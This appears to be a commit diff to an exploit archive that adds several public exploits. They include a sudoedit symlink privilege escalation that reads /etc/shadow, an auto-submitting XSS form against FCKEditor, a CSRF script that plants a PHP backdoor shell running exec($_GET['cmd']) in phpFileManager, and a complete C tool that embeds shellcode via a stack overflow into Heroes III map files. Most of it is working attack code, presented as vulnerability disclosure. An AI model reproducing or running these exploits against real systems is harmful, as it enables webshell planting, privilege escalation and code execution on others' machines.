- Solution: In "config.asp", wherever you have: ConfigAllowedExtensions.Add "File","EXTENSION HERE" Change it to: ConfigAllowedExtensions.Add "File","^(Extensions HERE)$"
- Vulnerability: Vulnerable File: commands.asp Function: FileUpload() Vulnerable Code: sFileName = RemoveExtension( sOriginalFileName ) & "(" & iCounter & ")." & sExtension
Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:

36
platforms/linux/local/37710.txt Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation
# Date: 07-23-2015
# Exploit Author: Daniel Svartman
# Version: Sudo <=1.8.14
# Tested on: RHEL 5/6/7 and Ubuntu (all versions)
# CVE: CVE-2015-5602.
Hello,
I found a security bug in sudo (checked in the latest versions of sudo
running on RHEL and ubuntu) when a user is granted with root access to
modify a particular file that could be located in a subset of directories.
It seems that sudoedit does not check the full path if a wildcard is used
twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the
file.txt real file with a symbolic link to a different location (e.g.
/etc/shadow).
I was able to perform such redirect and retrieve the data from the
/etc/shadow file.
In order for you to replicate this, you should configure the following line
in your /etc/sudoers file:
<user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
Then, logged as that user, create a subdirectory within its home folder
(e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link
inside the new folder named test.txt pointing to /etc/shadow.
When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will
be allowed to access the /etc/shadow even if have not been granted with
such access in the sudoers file.
I checked this against fixed directories and files (not using a wildcard)
and it does work with symbolic links created under the /home folder.

2
platforms/php/webapps/37457.html
View file

@ -6,5 +6,5 @@ An attacker may leverage this issue to execute arbitrary script code in the brow
FCKEditor 2.6.7 is vulnerable; prior versions may also be affected.
html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>

125
platforms/php/webapps/37712.txt Executable file
View file

@ -0,0 +1,125 @@
# Exploit Title: CSRF Remote Backdoor Shell
# Google Dork: intitle: CSRF Remote Backdoor Shell
# Date: 2015-07-29
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: phpfm.sourceforge.net
# Software Link: phpfm.sourceforge.net
# Version: 0.9.8
# Tested on: windows 7 SP1
# Category: Webapps
Vendor:
================================
phpfm.sourceforge.net
Product:
============================
phpFileManager version 0.9.8
Vulnerability Type:
==========================
CSRF Remote Backdoor Shell
CVE Reference:
==============
N/A
Advisory Information:
========================================
CSRF Remote Backdoor Shell Vulnerability
Vulnerability Details:
=======================================================================
PHP File Manager is vulnerable to creation of arbitrary files on server
via CSRF which we can use to create remote backdoor shell access if victim
clicks our malicious linx or visits our malicious webpages.
To create backdoor shell we will need to execute two POST requests
1- to create PHP backdoor shell 666.php
2- inject code and save to the backdoor we just created
e.g.
https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ]
Exploit code(s):
===============
<script>
var
scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
blasphemer(scripto)
var
maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='<?php+echo+'backdoor
shell by hyp3rlinx......';+exec($_GET['cmd']);+?>"
blasphemer(maliciouso)
function blasphemer(payload){
var xhr=new XMLHttpRequest()
xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
xhr.send(payload)
}
</script>
Disclosure Timeline:
=========================================================
Vendor Notification: July 28, 2015
July 29, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] phpFileManager 0.9.8
Vulnerable Parameter(s): [+] action, cmd_arg, file_data, chmod_arg,
save_file
Affected Area(s): [+] Web Server
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

27
platforms/php/webapps/37715.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Tendoo CMS Stored And Reflected Xss Vulnerability
# Google Dork: N/A
# Date: 28/7/2015
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://tendoo.org/
# Software Link: http://sourceforge.net/projects/tendoo-cms/
# Version: 1.3
# Tested on: Kali , Windows
# CVE : N/A
# Contact : 0xclay@gmail.com
######################
Introduction :
a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMS
Make CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... .
######################
Stored Xss In http://localhost/tendoo/index.php/account/update In First
Name and Last Name Inputs
Excute Java Script Codes And If Admin Or Any Body Come In Attacker Profile
When First Name And Last Name Loads
JavaScripts Code Will Be Excuted
POC :
https://i.leetfil.es/e992ad2d.jpg
Discovered By Arash Khazaei

2
platforms/win64/local/37064.py
View file

@ -6,6 +6,8 @@
# Target OS Windows 8.0 - 8.1 x64
# Author: Matteo Memelli ryujin <at> offensive-security.com
# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time, threading, signal

272
platforms/windows/local/37716.c Executable file
View file

@ -0,0 +1,272 @@
/*
# Exploit Title : Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution
# Date : 2015-07-29
# Exploit Author : John AAkerblom, Pierre Lindblad
# Website: http://h3minternals.net
# Vendor Homepage : 3do.com (defunct), https://sites.google.com/site/heroes3hd/
# Version : 4.0.0.0 AND HoMM 3 HD 3.808 build 9
# Tested on : Windows XP, Windows 8.1
# Category: exploits
# Description:
This PoC embeds an exploit into an uncompressed map file (.h3m) for Heroes
of Might and Magic III. Once the map is started in-game, a buffer overflow
occuring when loading object sprite names leads to shellcode execution.
Only basic arbitrary code execution is covered in this PoC but is possible to
craft an exploit that lets the game continue normally after the shellcode has
been executed. Using extensive knowledge of the .h3m format, it is even
possible to create a map file that loads like normal in the game's map editor
(which lacks the vulnerability) but stealthily executes shellcode when opened
in-game.
*/
#include <string.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
/* Calc payload: https://code.google.com/p/win-exec-calc-shellcode/
0xEBFE added at end. Note that a NULL-less payload is not actually needed
Copyright (c) 2009-2014 Berend-Jan "SkyLined" Wever <berendjanwever@gmail.com>
and Peter Ferrie <peter.ferrie@gmail.com>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the copyright holder nor the names of the
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED ''AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */
static const uint8_t CALC_PAYLOAD[] = {
0x31, 0xD2, 0x52, 0x68, 0x63, 0x61, 0x6C, 0x63, 0x54, 0x59, 0x52,
0x51, 0x64, 0x8B, 0x72, 0x30, 0x8B, 0x76, 0x0C, 0x8B, 0x76, 0x0C,
0xAD, 0x8B, 0x30, 0x8B, 0x7E, 0x18, 0x8B, 0x5F, 0x3C, 0x8B, 0x5C,
0x1F, 0x78, 0x8B, 0x74, 0x1F, 0x20, 0x01, 0xFE, 0x8B, 0x54, 0x1F,
0x24, 0x0F, 0xB7, 0x2C, 0x17, 0x42, 0x42, 0xAD, 0x81, 0x3C, 0x07,
0x57, 0x69, 0x6E, 0x45, 0x75, 0xF0, 0x8B, 0x74, 0x1F, 0x1C, 0x01,
0xFE, 0x03, 0x3C, 0xAE, 0xFF, 0xD7, 0xEB, 0xFE
};
/*
* The memmem() function finds the start of the first occurrence of the
* substring 'needle' of length 'nlen' in the memory area 'haystack' of
* length 'hlen'.
*
* The return value is a pointer to the beginning of the sub-string, or
* NULL if the substring is not found.
*
* Original author: caf, http://stackoverflow.com/a/2188951
*/
static uint8_t *_memmem(uint8_t *haystack, size_t hlen, uint8_t *needle, size_t nlen)
{
uint8_t needle_first;
uint8_t *p = haystack;
size_t plen = hlen;
if (!nlen)
return NULL;
needle_first = *(uint8_t *)needle;
while (plen >= nlen && (p = memchr(p, needle_first, plen - nlen + 1)))
{
if (!memcmp(p, needle, nlen))
return p;
p++;
plen = hlen - (p - haystack);
}
return NULL;
}
#ifdef _MSC_VER
#pragma warning(disable:4996) // M$ fopen so unsafe
#endif
#pragma pack(push, 1)
// exploit struct
// .h3m files contain an array of object attributes - OA - in which each
// entry starts with a string length and then a string for an object sprite.
// This exploit overflows the stack with a malicious sprite name.
struct exploit_oa_t
{
uint32_t size; // size of the rest of this struct, including shellcode
// The rest of the struct is the sprite name for the OA, <size> bytes of
// which an CALL ESP-gadget address is placed so that it overwrites the
// return address, when ESP is called shellcode2 will be executed. An
// additional 2 "anticrash" gadgets are needed so the game does not crash
// before returning to the CALL ESP-gadget.
uint8_t nullbyte; // Must be 0x00, terminating sprite name
uint8_t overwritten[6]; // Overwritten by game
uint8_t shellcode1[121]; // Mostly not used, some is overwritten
uint32_t call_esp_gadget; // Address of CALL [ESP], for saved eip on stack
// anticrash_gadget1, needs to pass the following code down to final JMP:
//
// MOV EAX, DWORD PTR DS : [ESI + 4] ; [anticrash_gadget1 + 4]
// XOR EBX, EBX
// CMP EAX, EBX
// JE SHORT <crash spot> ; JMP to crash if EAX is 0
// MOV CL, BYTE PTR DS : [EAX - 1]
// CMP CL, BL
// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0
// CMP CL, 0FF
// JE SHORT <crash spot> ; JMP to crash if the byte before [EAX] is 0xFF
// CPU Disasm
// CMP EDI, EBX
// JNE <good spot> ; JMP to good spot. Always occurs if we get this far
uint32_t anticrash_gadget1;
// anticrash_gadget2, needs to return out of the following call (tricky):
//
// MOV EAX, DWORD PTR DS : [ECX] ; [anticrash_gadget2]
// CALL DWORD PTR DS : [EAX + 4] ; [[anticrash_gadget2] + 4]
uint32_t anticrash_gadget2;
// Here at 144 bytes into this struct comes the shellcode that will be
// executed. For the game to survive, it is wise to use this only for a
// short jmp as doing so means only 2 values have to be restored on the
// stack. Namely: original return address and format value of the h3m.
// This PoC simply puts shellcode here, meaning the game cannot continue
// after shellcode execution.
uint8_t shellcode2[];
};
struct offsets_t
{
uint32_t call_esp_gadget;
uint32_t anticrash_gadget1;
uint32_t anticrash_gadget2;
};
#pragma pack(pop)
static const struct offsets_t * const TARGET_OFFSETS[] = {
(struct offsets_t *)"\x87\xFF\x4E\x00\xD4\x97\x44\x00\x30\x64\x6A\x00",
(struct offsets_t *)"\x0F\x0C\x58\x00\x48\x6A\x45\x00\x30\x68\x6A\x00"
};
#define TARGET_DESCS " 1: H3 Complete 4.0.0.0 [Heroes3.exe 78956DFAB3EB8DDF29F6A84CF7AD01EE]\n" \
" 2: HD Mod 3.808 build 9 [Heroes3 HD.exe 56614D31CC6F077C2D511E6AF5619280]"
#define MAX_TARGET 2
// Name of a sprite present in all maps, this is overwritten with exploit
#define NEEDLE "AVWmrnd0.def"
int pack_h3m(FILE *h3m_f, const struct offsets_t * const ofs, const uint8_t *payload, long payload_size)
{
uint8_t *buf = NULL;
uint8_t *p = NULL;
long h3m_size = 0;
long bytes = 0;
struct exploit_oa_t *exp = NULL;
// Read entire h3m file into memory
fseek(h3m_f, 0, SEEK_END);
h3m_size = ftell(h3m_f);
rewind(h3m_f);
buf = malloc(h3m_size);
if (buf == NULL) {
puts("[!] Failed to allocate memory");
return 1;
}
bytes = fread(buf, sizeof(uint8_t), h3m_size, h3m_f);
if (bytes != h3m_size) {
free(buf);
puts("[!] Failed to read all bytes");
return 1;
}
// Find game object array in .h3m, where we will overwrite the first entry
p = _memmem(buf, h3m_size, (uint8_t *)NEEDLE, sizeof(NEEDLE) - 1);
if (p == NULL) {
puts("[!] Failed to find needle \"" NEEDLE "\" in file. Make sure it is an uncompressed .h3m");
free(buf);
return 1;
}
// Move back 4 bytes from sprite name, pointing to the size of the sprite name
p -= 4;
// Overwrite the first game object with exploit
exp = (struct exploit_oa_t *)p;
exp->size = sizeof(*exp) - sizeof(exp->size) + payload_size;
exp->nullbyte = 0;
exp->call_esp_gadget = ofs->call_esp_gadget;
exp->anticrash_gadget1 = ofs->anticrash_gadget1;
exp->anticrash_gadget2 = ofs->anticrash_gadget2;
memcpy(exp->shellcode2, payload, payload_size);
// Write entire file from memory and cleanup
rewind(h3m_f);
bytes = fwrite(buf, sizeof(uint8_t), h3m_size, h3m_f);
if (bytes != h3m_size) {
free(buf);
puts("[!] Failed to write all bytes");
return 1;
}
free(buf);
return 0;
}
static void _print_usage(void)
{
puts("Usage: h3mpacker <uncompressed h3m filename> <target #>");
puts("Available targets:");
puts(TARGET_DESCS);
puts("Examples:");
puts(" h3mpacker Arrogance.h3m 1");
puts(" h3mpacker Deluge.h3m 2");
}
int main(int argc, char **argv)
{
FILE *h3m_f = NULL;
int ret = 0;
int target;
if (argc != 3) {
_print_usage();
return 1;
}
h3m_f = fopen(argv[1], "rb+");
target = strtoul(argv[2], NULL, 0);
if (h3m_f == NULL || target < 1 || target > MAX_TARGET) {
if (h3m_f != NULL)
fclose(h3m_f);
_print_usage();
return 1;
}
ret = pack_h3m(h3m_f, TARGET_OFFSETS[target-1], CALC_PAYLOAD, sizeof(CALC_PAYLOAD));
fclose(h3m_f);
if (ret != 0)
return ret;
printf("[+] Payload embedded into h3m file %s\n", argv[1]);
return 0;
}